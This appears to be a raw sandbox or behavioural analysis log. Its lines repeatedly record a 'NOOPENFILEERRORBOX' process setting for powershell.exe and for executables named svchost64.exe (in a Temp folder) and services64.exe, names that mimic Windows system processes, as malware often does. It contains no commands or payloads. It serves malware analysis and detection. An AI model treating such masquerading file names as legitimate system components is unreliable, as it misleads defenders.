Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\services64.exe	Process information set: NOOPENFILEERRORBOX
